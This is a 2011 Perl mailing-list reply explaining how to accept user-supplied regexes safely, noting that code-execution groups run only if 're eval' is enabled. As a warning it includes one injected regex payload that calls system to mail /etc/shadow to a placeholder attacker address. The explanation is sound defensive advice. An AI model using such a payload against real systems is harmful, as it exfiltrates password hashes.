On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote: > Suppose you have a collection of books, and want to provide your users > with the ability to search the book title, author or content using > regular expressions. > > But you don't want to let them execute any code. > > How would you validate/compile/evaluate the user provided regex so as to > provide maximum flexibility and prevent code execution?
In general this shouldn't be a problem provided you don't turn on use re "eval"; $ perl -e '/$ARGV[0]/' '(?{ print "hello" })' Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print "hello" })/ at -e line 1. $ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })' hello Of course, you're not going to be too worried about people saying hello, but once you can execute arbitrary code all bets are off: $ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.com < /etc/shadow" ])' Make sure you don't do the whole match as part of a string eval, and since you're only matching, you shouldn't have to worry about s///e. If you prefer a more paranoid approach you might want to restrict the characters you allow in the user input, but this doesn't provide maximum flexibility. -- Paul Johnson - p...@pjcj.net http://www.pjcj.net -- To unsubscribe, e-mail: beginners-unsubscr...@perl.org For additional commands, e-mail: beginners-h...@perl.org http://learn.perl.org/